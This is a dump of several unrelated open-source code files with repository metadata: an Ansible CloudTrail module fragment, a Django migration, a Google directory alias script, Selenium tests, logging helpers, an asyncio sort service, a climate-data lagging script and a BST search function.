if tags_changed:
results['changed'] = True
trail['tags'] = tags
results['trail'] = camel_dict_to_snake_dict(trail)
elif ((state == 'present') and (not results['exists'])):
results['changed'] = True
if (not module.check_mode):
created_trail = create_trail(module, client, ct_params)
tag_trail(module, client, tags=tags, trail_arn=created_trail['TrailARN'])
try:
status_resp = client.get_trail_status(Name=created_trail['Name'])
except ClientError as err:
module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))
if (enable_logging and (not status_resp['IsLogging'])):
set_logging(module, client, name=ct_params['Name'], action='start')
if ((not enable_logging) and status_resp['IsLogging']):
set_logging(module, client, name=ct_params['Name'], action='stop')
trail = get_trail_facts(module, client, ct_params['Name'])
if module.check_mode:
acct_id = '123456789012'
try:
sts_client = boto3_conn(module, conn_type='client', resource='sts', region=region, endpoint=ec2_url, **aws_connect_params)
acct_id = sts_client.get_caller_identity()['Account']
except ClientError:
pass
trail = dict()
trail.update(ct_params)
trail['LogFileValidationEnabled'] = ct_params['EnableLogFileValidation']
trail.pop('EnableLogFileValidation')
fake_arn = ((((('arn:aws:cloudtrail:' + region) + ':') + acct_id) + ':trail/') + ct_params['Name'])
trail['HasCustomEventSelectors'] = False
trail['HomeRegion'] = region
trail['TrailARN'] = fake_arn
trail['IsLogging'] = enable_logging
trail['tags'] = tags
results['trail'] = camel_dict_to_snake_dict(trail)
module.exit_json(**results)
| [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
52cfaa859b7fc79c6e21e658da2d2c8e37299b9f | 55942d2d44f293bc05351a7c9836eb67c9acf5f6 | /ecommerce/user_model/migrations/0006_auto_20190201_2041.py | 6a9dba631afd1623f9823c7a2848bc174c907b98 | [] | no_license | Maheshwari2604/ecommerce | 92c789524b7042def9621839cfe7e83776561814 | 1f58e23adb1185dee774bd90f793e0be3d4ad53f | refs/heads/master | 2020-04-18T17:48:52.480108 | 2019-02-02T08:43:10 | 2019-02-02T08:43:10 | 167,665,723 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,369 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-02-01 20:41
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('user_model', '0005_register_model_verified'),
]
operations = [
migrations.CreateModel(
name='address',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('city', models.CharField(max_length=30)),
('service_area', models.CharField(max_length=100)),
('local_address', models.CharField(max_length=200)),
('pin', models.PositiveIntegerField()),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.RenameField(
model_name='register_model',
old_name='email_confirmed',
new_name='email_verified',
),
migrations.RemoveField(
model_name='register_model',
name='verified',
),
migrations.AddField(
model_name='address',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='user_model.register_model'),
),
]
| [
"maheshwarishivam2604@gmail.com"
] | maheshwarishivam2604@gmail.com |
19262e47b10b332431050c327993066170f36ffe | 763ca657487d349e57fb2e2753c9ee6d930043e8 | /djusagi/bin/aliases.py | 63d8d9092ccc59747a22d73e664755a6b871cf15 | [
"MIT"
] | permissive | carthage-college/django-djusagi | b680728ab292ab427e9b95fbb8f8a8de232a6809 | ff890b270a9d21b9130068d69df680e5cf5e04ee | refs/heads/master | 2023-04-07T09:13:08.719663 | 2023-03-28T14:08:43 | 2023-03-28T14:08:43 | 41,050,821 | 0 | 0 | MIT | 2023-03-13T21:42:05 | 2015-08-19T17:57:56 | Python | UTF-8 | Python | false | false | 2,244 | py | # -*- coding: utf-8 -*-
import sys
# env
sys.path.append('/usr/local/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/')
from django.conf import settings
from djusagi.core.utils import get_cred
from googleapiclient.discovery import build
import argparse
import httplib2
"""
Fetch all users from the Google API for a given domain
and check for aliases
"""
# set up command-line options
desc = """
Obtain all aliases from all users in the domain
"""
EMAIL = settings.DOMAIN_SUPER_USER_EMAIL
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
"--test",
action='store_true',
help="Dry run?",
dest="test"
)
def main():
"""
main function
"""
credentials = get_cred(EMAIL, "admin.directory.user")
http = httplib2.Http()
service = build(
"admin", "directory_v1", http=credentials.authorize(http)
)
user_list = []
page_token = None
while True:
results = service.users().list(
domain=EMAIL.split('@')[1],
maxResults=100,
pageToken=page_token,
orderBy='familyName', viewType='domain_public'
).execute(num_retries=10)
for r in results["users"]:
user_list.append(r)
page_token = results.get('nextPageToken')
if not page_token:
break
for user in user_list:
pmail = user.get('primaryEmail')
if pmail:
aliases = service.users().aliases().list(userKey=pmail).execute(
num_retries=10
)
if aliases and aliases.get('aliases'):
for alias in aliases.get('aliases'):
if alias.get('alias'):
print('{}|{}|{}|{}'.format(
user.get('name').get('familyName'),
user.get('name').get('givenName'),
user.get('primaryEmail'), alias.get('alias')
))
######################
# shell command line
######################
if __name__ == "__main__":
args = parser.parse_args()
test = args.test
if test:
print(args)
sys.exit(main())
| [
"plungerman@gmail.com"
] | plungerman@gmail.com |
c26b1e698d6b28cb8ba41501b866f0a0d5697daf | 85ab389658b2fbbb0e56f35e90df35ffb7b3c6dd | /UI_Automation/Tests/test_A_HomePage.py | bdf3d6557013817996f3552a0796fb977186bae4 | [] | no_license | akashgkrishnan/Fm_Staging_automation | 0a306ba0d931db450e3156cdbe8111f63d214889 | 5e8903226ebaa4d512f4f9c9fa581c0d8e227726 | refs/heads/master | 2023-05-13T05:56:02.831480 | 2020-06-03T07:11:26 | 2020-06-03T07:11:26 | 263,627,594 | 0 | 0 | null | 2021-06-02T01:50:17 | 2020-05-13T12:46:34 | Python | UTF-8 | Python | false | false | 6,056 | py | from _csv import reader
from random import randint
from csv import writer
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from UI_Automation.pageObjects.EmployerHome import EmployerHome
from UI_Automation.pageObjects.EmployerSignUp import EmployerSignUp
from UI_Automation.pageObjects.FmContactPage import FmContactPage
from UI_Automation.pageObjects.FmHomeEmployer import FmEmployerPage
from UI_Automation.pageObjects.FmHomePage import FmHomePage
from UI_Automation.pageObjects.EmployerSignInPage import SignInPage
from UI_Automation.utilities.BaseClass import BaseClass
from time import sleep
class TestFmHomePage(BaseClass):
def random_mobile(self):
return randint(1111111111, 5555555555)
def test_employer_FM_home(self):
home_page = FmHomePage(self.driver)
home_page.get_employer().click()
employer_intro = FmEmployerPage(self.driver)
employer_intro.get_request_demo().click()
sleep(2)
employer_intro.get_name_field().send_keys('Akash G Krishnan')
employer_intro.get_email_field().send_keys('akash.k@oneassist.in')
employer_intro.get_phone_field().send_keys('8130233807')
employer_intro.get_company_field().send_keys('KRISHNAN')
employer_intro.get_company_website_field().send_keys('www.google.co.in')
employer_intro.get_submit_demo().click()
sleep(7)
def test_contact_page(self):
home_page = FmHomePage(self.driver)
home_page.get_contact().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//h1[contains(text(),"Hello!")]'))
)
contact_page = FmContactPage(self.driver)
contact_page.get_name_field().send_keys("Akash G Krishnan")
contact_page.get_company_field().send_keys("KRISHNAN")
mobile = self.random_mobile()
contact_page.get_email_field().send_keys(str(mobile) + '@mailinator.com')
contact_page.get_phone_field().send_keys(mobile)
contact_page.get_query_field().send_keys('test script run using selenium web driver api. test script run using selenium web driver api.')
contact_page.get_submit_btn().click()
sleep(5)
assert contact_page.get_success_text().text == 'Thank You!'
def test_interviewer_landing(self):
home_page = FmHomePage(self.driver)
home_page.get_interviewer().click()
sleep(3)
def test_employer_signUp(self):
home_page = FmHomePage(self.driver)
home_page.get_employer_signUp().click()
sleep(5)
child_window = self.driver.window_handles[-1]
self.driver.close()
self.driver.switch_to.window(child_window)
employee_page = EmployerSignUp(self.driver)
employee_page.get_company().send_keys('Automation Company 123')
employee_page.get_fullName().send_keys('Akash G Krishnan ak')
employee_page.get_email().click()
mobile = self.random_mobile()
email = str(mobile) + '@mailinator.com'
employee_page.get_email().send_keys(email)
password = 'Testing@123'
employee_page.get_password().send_keys(password)
employee_page.get_confirm_password().send_keys(password)
with open('..\TestData\login.txt', 'a') as file:
csv_writer = writer(file)
csv_writer.writerow([email, password])
employee_page.get_signup_button().click()
sleep(3)
assert 'Click on the verification link to activate your account.' in employee_page.get_success_modal().text
employee_page.get_success_confirm().click()
self.driver.get('https://www.mailinator.com/')
self.driver.find_element_by_xpath("//input[@id='addOverlay']").send_keys(mobile)
self.driver.find_element_by_xpath("//input[@id='addOverlay']").send_keys(Keys.ENTER)
self.driver.find_element_by_xpath('//tr[1]//td[3]').click()
self.driver.find_element_by_xpath("//button[contains(text(),'Show Links')]").click()
verification_url = self.driver.find_element_by_xpath("//div[@id='clicklinks']").text
self.driver.get(verification_url)
assert 'Welcome to FoxMatrix' in self.driver.find_element_by_xpath("//h2[contains(text(),'Welcome to FoxMatrix')]").text
self.driver.find_element_by_xpath("//button[contains(text(),'Go to Login')]").click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//input[@name="email"]'))
)
sign_in = SignInPage(self.driver)
sign_in.get_email_field().click()
sign_in.get_email_field().send_keys(email)
sign_in.get_password_field().send_keys(password)
sign_in.get_login_button().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, "//button[contains(text(),'Setup Your Account')]"))
)
def test_employer_signIn(self):
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//input[@name="email"]'))
)
with open('..\TestData\login.txt') as file:
csv_Reader = list(reader(file))[::-1]
self.email =csv_Reader[1][0]
self.password = csv_Reader[1][1]
home_page = FmHomePage(self.driver)
home_page.get_employer_sign_in().click()
sleep(3)
child_window = self.driver.window_handles[-1]
self.driver.close()
self.driver.switch_to.window(child_window)
sign_in = SignInPage(self.driver)
sign_in.get_email_field().click()
sign_in.get_email_field().send_keys(self.email)
sign_in.get_password_field().send_keys(self.password)
sign_in.get_login_button().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.LINK_TEXT, 'Setup Your Account'))
)
| [
"krishnanag1996@gmail.com"
] | krishnanag1996@gmail.com |
600f054f49e78cf24098421655e1523203fa53d8 | 9553ebbc332975477a40be1ca3f333beff9d382c | /my_logger.py | 643c3f75aeb6ba74bcc4323ad85ddf902407827c | [] | no_license | smellycats/SX-UnionKafkaCSClient | f406056ac726968f71373c0199d46c73fbbbff17 | 2a1c52bdce32e7e30e2f1f23edfae89346cfa0fd | refs/heads/master | 2021-09-05T04:20:48.498408 | 2017-11-28T08:54:35 | 2017-11-28T08:54:35 | 112,099,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,616 | py | import os
import logging
import logging.handlers
def debug_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
logger = logging.getLogger('root')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=20 * 1024 * 1024, backupCount=5)
logger.setLevel(logging.INFO)
formatter = logging.Formatter(
'%(asctime)s %(filename)s[line:%(lineno)d] \
[%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
rthandler.setFormatter(formatter)
logger.addHandler(rthandler)
def online_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
logger = logging.getLogger('root')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=20 * 1024 * 1024, backupCount=5)
logger.setLevel(logging.INFO)
formatter = logging.Formatter(
'%(asctime)s [%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
rthandler.setFormatter(formatter)
logger.addHandler(rthandler)
def access_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
access_logger = logging.getLogger('access')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=100 * 1024 * 1024, backupCount=10)
access_logger.setLevel(logging.INFO)
access_logger.addHandler(rthandler)
| [
"smellycat2014@foxmail.com"
] | smellycat2014@foxmail.com |
5c92f6a56671d9890fb4aef4a30287078d8d5c25 | 39a9cd1d168dbd73987385f94ecb968f8eb0be80 | /medicine/migrations/0013_remove_type_med_type.py | a168c64968198db356545acbe34e0105ac956892 | [] | no_license | suhaskm96/medisearch | dc41e05247b0dc7a72fbd26917de3b895407e27e | 629629bcf20396a8c7ed25d384662d15ae7f1c90 | refs/heads/master | 2020-06-24T12:51:33.445648 | 2018-06-15T10:52:38 | 2018-06-15T10:52:38 | 198,967,048 | 1 | 0 | null | 2019-07-26T07:16:01 | 2019-07-26T07:16:00 | null | UTF-8 | Python | false | false | 389 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-04-14 23:00
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Remove the obsolete 'med_type' field from the 'type' model."""

    # Must run after the migration that originally added type.med_type.
    dependencies = [
        ('medicine', '0012_type_med_type'),
    ]
    operations = [
        # Drops the column from the database schema; data in it is lost.
        migrations.RemoveField(
            model_name='type',
            name='med_type',
        ),
    ]
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
6f1601446984a091f96b9571f04aae8710b12672 | 66765829bd7bad8d56624552a2cb41d9d4576025 | /solved/06/abc189_d.py | 0cdaf3a023d2e406f6287f2a682022187fc5c285 | [] | no_license | murakami10/atc_python | 9c0c935c58b55177586b0aa23a25032b59beaca8 | 98f91f43e4cbfadb35a1de250fca98ae53457023 | refs/heads/main | 2023-03-06T10:05:55.248376 | 2021-02-13T06:29:23 | 2021-02-13T06:29:23 | 320,210,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | N = int(input())
# Read the N operators ("AND" / "OR") for the expression
# y1 op1 y2 op2 ... yN over N+1 boolean variables.
S = [str(input()) for _ in range(N)]
# DP over the expression prefix: ways_true / ways_false count the
# variable assignments under which the prefix evaluates True / False.
# Base case: a single variable gives one True and one False assignment.
ways_true, ways_false = 1, 1
for op in S:
    if op == "AND":
        # prefix AND x: True only if both True; False in every other combo.
        ways_true, ways_false = ways_true, 2 * ways_false + ways_true
    else:
        # prefix OR x: False only if both False; True otherwise.
        ways_true, ways_false = 2 * ways_true + ways_false, ways_false
print(ways_true)
# https://atcoder.jp/contests/abc189/tasks/abc189_d
| [
"m.kyoya777@gmail.com"
] | m.kyoya777@gmail.com |
76cae0ffbd3466e9e2f9290d4d10df7eb386ab9a | 3a534e848c3962ccaad700bdd08bcdaa02f25ddb | /a4/movecircle.py | 43b465bdd17d8e1fbccf626ca43ac4e933632acb | [] | no_license | dragikamov/Advanced_Programming_in_Python | 48460d3b24de46b23e289224bfc3dc06d8f364e9 | db7491de24a54bc7dcac415fc7bd498afc3923d3 | refs/heads/master | 2020-04-27T13:08:24.240850 | 2019-03-07T14:18:18 | 2019-03-07T14:18:18 | 174,357,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | # 350112
# a4 1.py
# Dragi Kamov
# d.kamov@jacobs-university.de
from graphics import *
def main():
    """Draw a red square and jump it to the location of each of 10 clicks."""
    window = GraphWin()
    for _ in range(10):
        square = Rectangle(Point(30, 30), Point(70, 70))
        square.setOutline("red")
        square.setFill("red")
        square.draw(window)
        click = window.getMouse()
        center = square.getCenter()
        # Translate so the square's center lands on the click point.
        square.move(click.getX() - center.getX(),
                    click.getY() - center.getY())
    window.close()


main()
| [
"dragikamov@gmail.com"
] | dragikamov@gmail.com |
660d026a4cd37bb499fea685b14e4c17e430fcc2 | ab5cdf8f2de94c327e4679da84f941b1f3c04db4 | /kubernetes/test/test_v1_key_to_path.py | bb33f64a5c5d213fb5766a93b9a0fdc02a60e156 | [
"Apache-2.0"
] | permissive | diannaowa/client-python | a4a92a125178db26004eaef5062f9b1b581b49a8 | 5e268fb0b6f21a535a14a7f968b84ed4486f6774 | refs/heads/master | 2020-12-02T22:06:03.687696 | 2017-06-30T21:42:50 | 2017-06-30T21:42:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_key_to_path import V1KeyToPath
class TestV1KeyToPath(unittest.TestCase):
    """V1KeyToPath unit test stubs (auto-generated by swagger-codegen)."""
    def setUp(self):
        # No fixtures required: the test only constructs the model.
        pass
    def tearDown(self):
        pass
    def testV1KeyToPath(self):
        """
        Smoke test: V1KeyToPath can be instantiated with default arguments.
        """
        model = kubernetes.client.models.v1_key_to_path.V1KeyToPath()  # construction itself is the assertion
if __name__ == '__main__':
    unittest.main()
| [
"mehdy@google.com"
] | mehdy@google.com |
f3bb7cc1fd5db41d05739da7d79ff50bbc8d581e | 7eed7e912038c9a9cdb360aa3c91ac7fcbe7d8a5 | /Chapter13/sort_service.py | a7cd2466b671755179dddc5e8340fac6866caba6 | [
"MIT"
] | permissive | 4n3i5v74/Python-3-Object-Oriented-Programming-Third-Edition | 5228cc99f2e89fe9814140049ea400c29481a664 | 6310577f0a71588cf28d42994b5d9581640b5870 | refs/heads/master | 2023-03-27T08:42:49.488468 | 2021-03-22T03:07:47 | 2021-03-28T05:06:40 | 275,771,956 | 0 | 0 | MIT | 2020-06-29T08:16:50 | 2020-06-29T08:16:49 | null | UTF-8 | Python | false | false | 1,099 | py | import asyncio
import json
from concurrent.futures import ProcessPoolExecutor
def sort_in_process(data):
    """Gnome-sort the JSON-encoded list carried in *data*.

    Runs inside a worker process; deliberately uses a slow O(n^2) sort so
    the work is visibly CPU-bound.

    :param data: UTF-8 bytes containing a JSON array.
    :return: UTF-8 bytes containing the sorted JSON array.
    """
    values = json.loads(data.decode())
    i = 1
    while i < len(values):
        if values[i] < values[i - 1]:
            # Out of order: swap the pair and step back to re-check.
            values[i - 1], values[i] = values[i], values[i - 1]
            i = max(1, i - 1)
        else:
            i += 1
    return json.dumps(values).encode()
async def sort_request(reader, writer):
    """Handle one client: read a length-prefixed JSON list, sort it in a
    worker process, and write the sorted bytes back before closing."""
    print("Received connection")
    # Wire format: 8-byte big-endian length prefix, then the JSON payload.
    header = await reader.read(8)
    payload = await reader.readexactly(int.from_bytes(header, "big"))
    loop = asyncio.get_event_loop()
    # Off-load the CPU-bound sort to the default (process pool) executor.
    sorted_payload = await loop.run_in_executor(None, sort_in_process, payload)
    print("Sorted list")
    writer.write(sorted_payload)
    writer.close()
    print("Connection closed")
# Serve on localhost:2015; CPU-bound sorting is pushed to a process pool so
# the event loop stays responsive while lists are being sorted.
loop = asyncio.get_event_loop()
loop.set_default_executor(ProcessPoolExecutor())
server = loop.run_until_complete(
    asyncio.start_server(sort_request, "127.0.0.1", 2015)
)
print("Sort Service running")
loop.run_forever()  # blocks until the loop is stopped externally
# Shutdown path (reached only after run_forever() returns):
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
| [
"ketank@packtpub.com"
] | ketank@packtpub.com |
597e6dfa6aa66205665a9db5cf233af448ee78b7 | e495badcd88e4f95ae99f33f8aa740d1e5e7a875 | /0x08-python-more_classes/3-rectangle.py | 7604bd6fe4645a74c0d2a0bee600b626b7b9c889 | [] | no_license | Immaannn2222/holbertonschool-higher_level_programming | 059ed232af3d1ad54e4d7eff97a0dcb4d61585fb | 1c65e5a6d3632f7e28803ebb2699229390883ec7 | refs/heads/master | 2022-12-17T23:42:00.632652 | 2020-09-24T18:02:12 | 2020-09-24T18:02:12 | 259,304,604 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,375 | py | #!/usr/bin/python3
"""Rectangle class"""
class Rectangle:
    """A width x height rectangle with validated non-negative int sides."""

    def __init__(self, width=0, height=0):
        # Route through the property setters so validation always runs;
        # width is validated (and may raise) before height.
        self.width = width
        self.height = height

    @property
    def width(self):
        """Horizontal size of the rectangle."""
        return self.__width

    @width.setter
    def width(self, value):
        if not isinstance(value, int):
            raise TypeError("width must be an integer")
        if value < 0:
            raise ValueError("width must be >= 0")
        self.__width = value

    @property
    def height(self):
        """Vertical size of the rectangle."""
        return self.__height

    @height.setter
    def height(self, value):
        if not isinstance(value, int):
            raise TypeError("height must be an integer")
        if value < 0:
            raise ValueError("height must be >= 0")
        self.__height = value

    def area(self):
        """Return the area (width * height)."""
        return self.__height * self.__width

    def perimeter(self):
        """Return the perimeter, or 0 when either side is 0."""
        if self.__width == 0 or self.__height == 0:
            return 0
        return 2 * (self.__width + self.__height)

    def __str__(self):
        """Render as rows of '#'; empty string for a degenerate rectangle."""
        if self.__width <= 0 or self.__height <= 0:
            return ""
        row = "#" * self.__width
        return "\n".join([row] * self.__height)
| [
"imennaayari@gmail.com"
] | imennaayari@gmail.com |
9e6c62a0b8c8c640c66886053a78168485cff232 | 077c91b9d5cb1a6a724da47067483c622ce64be6 | /fuzz_pyretic_mesh_proactive_firewall_no_close_check_loop_mcs_with_max_replays_5/interreplay_35_l_3/openflow_replay_config.py | 34b65c25622a41540245bfa018421a1f35b62a19 | [] | no_license | Spencerx/experiments | 0edd16398725f6fd9365ddbb1b773942e4878369 | aaa98b0f67b0d0c0c826b8a1565916bf97ae3179 | refs/heads/master | 2020-04-03T10:11:40.671606 | 2014-06-11T23:55:11 | 2014-06-11T23:55:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py |
from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow import OpenFlowReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger
# Replay configuration generated by STS: a 3-switch full-mesh topology driven
# by a single Pyretic firewall controller running the no-close example.
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd='./pyretic.py -m p0 pyretic.examples.firewall_for_sts_no_close', label='c1', address='127.0.0.1', cwd='../pyretic', kill_cmd='ps aux | grep -e pox -e pyretic | grep -v simulator | cut -c 9-15 | xargs kill -9')],
                     topology_class=MeshTopology,
                     topology_params="num_switches=3",
                     patch_panel_class=BufferedPatchPanel,
                     multiplex_sockets=False,
                     kill_controllers_on_exit=True)
# Replays the recorded OpenFlow events from the interreplay_35_l_3 trace.
control_flow = OpenFlowReplayer(simulation_config, "experiments/fuzz_pyretic_mesh_proactive_firewall_no_close_check_loop_mcs/interreplay_35_l_3/events.trace")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'None'
| [
"cs@cs.berkeley.edu"
] | cs@cs.berkeley.edu |
4c54990b4fdbf3433f3e4d0b319960ecfb420659 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/era5_scripts/02_preprocessing/lag82/563-tideGauge.py | edc98a675063801b2e15b98450b11705c42804f6 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,984 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
# Input/output directories on the cluster filesystem.
dir_in = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
dir_out = '/lustre/fs0/home/mtadesse/eraFiveLag'
def lag():
    """Build time-lagged predictor files for one tide-gauge CSV.

    Reads the CSV at index x of dir_in's listing, builds a daily date range
    spanning its records, creates 0/6/12/18/24/30-hour lagged copies of the
    predictors by merging on shifted timestamps, and writes the combined
    frame to dir_out under the same file name.

    NOTE(review): relies on os.chdir side effects and on a stable listing
    order from os.listdir — confirm before running elsewhere.
    """
    os.chdir(dir_in)
    # get the tide-gauge file names (order is filesystem-dependent)
    tg_list_name = os.listdir()
    # process only the single file at this index (job-array style slicing)
    x = 563
    y = 564
    for t in range(x, y):
        tg_name = tg_list_name[t]
        print(tg_name, '\n')
        # #check if the file exists
        # os.chdir(dir_out)
        # if (os.path.isfile(tg_name)):
        #     print('file already exists')
        #     continue
        # cd to where the actual file is
        os.chdir(dir_in)
        pred = pd.read_csv(tg_name)
        pred.sort_values(by = 'date', inplace=True)
        pred.reset_index(inplace = True)
        pred.drop('index', axis = 1, inplace = True)
        # create a daily time series - date_range
        # get only the ymd of the start and end times
        start_time = pred['date'][0].split(' ')[0]
        end_time = pred['date'].iloc[-1].split(' ')[0]
        print(start_time, ' - ', end_time, '\n')
        date_range = pd.date_range(start_time, end_time, freq = 'D')
        # defining time changing lambda functions
        time_str = lambda x: str(x)
        time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
        time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
        """
        first prepare the six time lagging dataframes
        then use the merge function to merge the original
        predictor with the lagging dataframes
        """
        # prepare lagged time series for time only
        # note here that since ERA20C has 3hrly data
        # the lag_hrs is increased from 6(eraint) to 11 (era20C)
        time_lagged = pd.DataFrame()
        lag_hrs = [0, 6, 12, 18, 24, 30]
        for lag in lag_hrs:
            lag_name = 'lag'+str(lag)
            # shift each daily timestamp back by `lag` hours (as a string key)
            lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
            lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
                                   columns = [lag_name])
            time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
        # dataframe that contains all lagged time series (just time)
        time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
        pred_lagged = pd.DataFrame()
        for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
            print(time_all.columns[ii])
            # extracting the corresponding lagged time series
            lag_ts = pd.DataFrame(time_all.iloc[:,ii])
            lag_ts.columns = ['date']
            # merge the selected lagged time with the predictor on = "date"
            pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
            pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
            # sometimes nan values go to the bottom of the dataframe
            # sort df by date -> reset the index -> remove old index
            pred_new.sort_values(by = 'date', inplace=True)
            pred_new.reset_index(inplace=True)
            pred_new.drop('index', axis = 1, inplace= True)
            # concatenate lagged dataframe (first lag keeps the date column)
            if ii == 1:
                pred_lagged = pred_new
            else:
                pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
        # cd to saving directory
        os.chdir(dir_out)
        pred_lagged.to_csv(tg_name)
        os.chdir(dir_in)
# run script
lag()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
b8b3aa3da22010a0dbb13fa9eae2bcadfe7846f4 | 636411baa2fc5b5c81710b37d6c53fa7076b9026 | /BST/find_first_greater_than_k.py | 12b3afc941d7a7ff0be4c0c824ceb1a71ea54c17 | [] | no_license | tberhanu/elts-of-coding | 9d90fb23db829c1b41782e2f96978ea9bde59484 | f17881c5732853935bc36b93d00ff58e7f759ed6 | refs/heads/master | 2023-01-04T13:28:31.315542 | 2020-10-30T01:24:48 | 2020-10-30T01:24:48 | 297,862,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,369 | py | from BST.detail_note import BSTNode
from BST import is_binary_tree_bst
from BST import sample_bst
def find_first_greater_than_k(tree, k):
    """
    Given a BST TREE and a value K, return the smallest stored value that is
    strictly greater than K, or None when no such value exists.

    Walk down from the root: a node whose value exceeds K is a candidate,
    and any better (smaller) candidate can only live in its left subtree;
    a node whose value is <= K can be skipped along with its entire left
    subtree, so the walk continues to the right.

    Time: O(H) where H is the BST tree height, O(log N).
    Space: O(1)
    """
    candidate, node = None, tree
    while node is not None:
        candidate, node = (
            (node.data, node.left) if node.data > k else (candidate, node.right)
        )
    return candidate
bst = BSTNode(990, BSTNode(200, BSTNode(188), BSTNode(299)), BSTNode(1000, BSTNode(999), BSTNode(1001)))
print(is_binary_tree_bst.is_binary_tree_bst(bst))
result = find_first_greater_than_k(bst, 299)
print(result)
print(is_binary_tree_bst.is_binary_tree_bst(sample_bst))
print(find_first_greater_than_k(sample_bst, 99))
| [
"tberhanu@berkeley.edu"
] | tberhanu@berkeley.edu |
a33ad1849151ab394185e17bf2023a657ad79628 | 0f1746146e1514bf20c25135cc624353d9c1a08e | /library/tests/test_utils.py | eac382d89c2518bb45a057b1b36500217a1f392b | [
"MIT"
] | permissive | kklimek/i2cdevice-python | 4bdb9ed46c109e78bc54cf512b98029705e34f10 | 54690cea60cbd91d8abffad38dcba3475236439b | refs/heads/master | 2020-08-04T06:20:40.253068 | 2019-10-01T07:37:15 | 2019-10-02T13:59:32 | 212,036,695 | 0 | 0 | MIT | 2019-10-01T07:28:23 | 2019-10-01T07:28:23 | null | UTF-8 | Python | false | false | 898 | py | from i2cdevice import _mask_width, _leading_zeros, _trailing_zeros, _int_to_bytes
import pytest
def test_mask_width():
    # Width spans highest..lowest set bit, including gaps (sparse masks).
    assert _mask_width(0b111) == 3
    assert _mask_width(0b101) == 3
    assert _mask_width(0b0111) == 3
    assert _mask_width(0b1110) == 3
def test_leading_zeros():
    # Zeros counted within an 8-bit window above the highest set bit.
    assert _leading_zeros(0b1) == 7
    assert _leading_zeros(0b10) == 6
    assert _leading_zeros(0b100) == 5
    assert _leading_zeros(0b100000000) == 8  # 9nth bit not counted by default
